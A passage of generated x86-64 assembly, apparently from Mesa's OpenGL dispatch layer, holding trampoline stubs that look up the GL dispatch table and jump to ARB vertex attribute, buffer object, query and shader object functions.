popq %rdi
movq 3912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dvARB), .-GL_PREFIX(VertexAttrib4dvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fARB)
.type GL_PREFIX(VertexAttrib4fARB), @function
GL_PREFIX(VertexAttrib4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3920(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fARB), .-GL_PREFIX(VertexAttrib4fARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fvARB)
.type GL_PREFIX(VertexAttrib4fvARB), @function
GL_PREFIX(VertexAttrib4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fvARB), .-GL_PREFIX(VertexAttrib4fvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ivARB)
.type GL_PREFIX(VertexAttrib4ivARB), @function
GL_PREFIX(VertexAttrib4ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3936(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ivARB), .-GL_PREFIX(VertexAttrib4ivARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4sARB)
.type GL_PREFIX(VertexAttrib4sARB), @function
GL_PREFIX(VertexAttrib4sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4sARB), .-GL_PREFIX(VertexAttrib4sARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4svARB)
.type GL_PREFIX(VertexAttrib4svARB), @function
GL_PREFIX(VertexAttrib4svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4svARB), .-GL_PREFIX(VertexAttrib4svARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ubvARB)
.type GL_PREFIX(VertexAttrib4ubvARB), @function
GL_PREFIX(VertexAttrib4ubvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3960(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ubvARB), .-GL_PREFIX(VertexAttrib4ubvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4uivARB)
.type GL_PREFIX(VertexAttrib4uivARB), @function
GL_PREFIX(VertexAttrib4uivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4uivARB), .-GL_PREFIX(VertexAttrib4uivARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4usvARB)
.type GL_PREFIX(VertexAttrib4usvARB), @function
GL_PREFIX(VertexAttrib4usvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4usvARB), .-GL_PREFIX(VertexAttrib4usvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribPointerARB)
.type GL_PREFIX(VertexAttribPointerARB), @function
GL_PREFIX(VertexAttribPointerARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3984(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribPointerARB), .-GL_PREFIX(VertexAttribPointerARB)
.p2align 4,,15
.globl GL_PREFIX(BindBufferARB)
.type GL_PREFIX(BindBufferARB), @function
GL_PREFIX(BindBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3992(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindBufferARB), .-GL_PREFIX(BindBufferARB)
.p2align 4,,15
.globl GL_PREFIX(BufferDataARB)
.type GL_PREFIX(BufferDataARB), @function
GL_PREFIX(BufferDataARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4000(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BufferDataARB), .-GL_PREFIX(BufferDataARB)
.p2align 4,,15
.globl GL_PREFIX(BufferSubDataARB)
.type GL_PREFIX(BufferSubDataARB), @function
GL_PREFIX(BufferSubDataARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4008(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BufferSubDataARB), .-GL_PREFIX(BufferSubDataARB)
.p2align 4,,15
.globl GL_PREFIX(DeleteBuffersARB)
.type GL_PREFIX(DeleteBuffersARB), @function
GL_PREFIX(DeleteBuffersARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteBuffersARB), .-GL_PREFIX(DeleteBuffersARB)
.p2align 4,,15
.globl GL_PREFIX(GenBuffersARB)
.type GL_PREFIX(GenBuffersARB), @function
GL_PREFIX(GenBuffersARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenBuffersARB), .-GL_PREFIX(GenBuffersARB)
.p2align 4,,15
.globl GL_PREFIX(GetBufferParameterivARB)
.type GL_PREFIX(GetBufferParameterivARB), @function
GL_PREFIX(GetBufferParameterivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4032(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferParameterivARB), .-GL_PREFIX(GetBufferParameterivARB)
.p2align 4,,15
.globl GL_PREFIX(GetBufferPointervARB)
.type GL_PREFIX(GetBufferPointervARB), @function
GL_PREFIX(GetBufferPointervARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferPointervARB), .-GL_PREFIX(GetBufferPointervARB)
.p2align 4,,15
.globl GL_PREFIX(GetBufferSubDataARB)
.type GL_PREFIX(GetBufferSubDataARB), @function
GL_PREFIX(GetBufferSubDataARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferSubDataARB), .-GL_PREFIX(GetBufferSubDataARB)
.p2align 4,,15
.globl GL_PREFIX(IsBufferARB)
.type GL_PREFIX(IsBufferARB), @function
GL_PREFIX(IsBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4056(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsBufferARB), .-GL_PREFIX(IsBufferARB)
.p2align 4,,15
.globl GL_PREFIX(MapBufferARB)
.type GL_PREFIX(MapBufferARB), @function
GL_PREFIX(MapBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapBufferARB), .-GL_PREFIX(MapBufferARB)
.p2align 4,,15
.globl GL_PREFIX(UnmapBufferARB)
.type GL_PREFIX(UnmapBufferARB), @function
GL_PREFIX(UnmapBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4072(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UnmapBufferARB), .-GL_PREFIX(UnmapBufferARB)
.p2align 4,,15
.globl GL_PREFIX(BeginQueryARB)
.type GL_PREFIX(BeginQueryARB), @function
GL_PREFIX(BeginQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4080(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BeginQueryARB), .-GL_PREFIX(BeginQueryARB)
.p2align 4,,15
.globl GL_PREFIX(DeleteQueriesARB)
.type GL_PREFIX(DeleteQueriesARB), @function
GL_PREFIX(DeleteQueriesARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4088(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteQueriesARB), .-GL_PREFIX(DeleteQueriesARB)
.p2align 4,,15
.globl GL_PREFIX(EndQueryARB)
.type GL_PREFIX(EndQueryARB), @function
GL_PREFIX(EndQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4096(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EndQueryARB), .-GL_PREFIX(EndQueryARB)
.p2align 4,,15
.globl GL_PREFIX(GenQueriesARB)
.type GL_PREFIX(GenQueriesARB), @function
GL_PREFIX(GenQueriesARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenQueriesARB), .-GL_PREFIX(GenQueriesARB)
.p2align 4,,15
.globl GL_PREFIX(GetQueryObjectivARB)
.type GL_PREFIX(GetQueryObjectivARB), @function
GL_PREFIX(GetQueryObjectivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryObjectivARB), .-GL_PREFIX(GetQueryObjectivARB)
.p2align 4,,15
.globl GL_PREFIX(GetQueryObjectuivARB)
.type GL_PREFIX(GetQueryObjectuivARB), @function
GL_PREFIX(GetQueryObjectuivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryObjectuivARB), .-GL_PREFIX(GetQueryObjectuivARB)
.p2align 4,,15
.globl GL_PREFIX(GetQueryivARB)
.type GL_PREFIX(GetQueryivARB), @function
GL_PREFIX(GetQueryivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryivARB), .-GL_PREFIX(GetQueryivARB)
.p2align 4,,15
.globl GL_PREFIX(IsQueryARB)
.type GL_PREFIX(IsQueryARB), @function
GL_PREFIX(IsQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4136(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsQueryARB), .-GL_PREFIX(IsQueryARB)
.p2align 4,,15
.globl GL_PREFIX(AttachObjectARB)
.type GL_PREFIX(AttachObjectARB), @function
GL_PREFIX(AttachObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AttachObjectARB), .-GL_PREFIX(AttachObjectARB)
.p2align 4,,15
.globl GL_PREFIX(CompileShaderARB)
.type GL_PREFIX(CompileShaderARB), @function
GL_PREFIX(CompileShaderARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4152(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompileShaderARB), .-GL_PREFIX(CompileShaderARB)
.p2align 4,,15
.globl GL_PREFIX(CreateProgramObjectARB)
.type GL_PREFIX(CreateProgramObjectARB), @function
GL_PREFIX(CreateProgramObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 4160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4160(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 4160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateProgramObjectARB), .-GL_PREFIX(CreateProgramObjectARB)
.p2align 4,,15
.globl GL_PREFIX(CreateShaderObjectARB)
.type GL_PREFIX(CreateShaderObjectARB), @function
GL_PREFIX(CreateShaderObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4168(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateShaderObjectARB), .-GL_PREFIX(CreateShaderObjectARB)
.p2align 4,,15
.globl GL_PREFIX(DeleteObjectARB)
.type GL_PREFIX(DeleteObjectARB), @function
GL_PREFIX(DeleteObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteObjectARB), .-GL_PREFIX(DeleteObjectARB)
.p2align 4,,15
.globl GL_PREFIX(DetachObjectARB)
.type GL_PREFIX(DetachObjectARB), @function
GL_PREFIX(DetachObjectARB):
#if defined(GLX_USE_TLS)
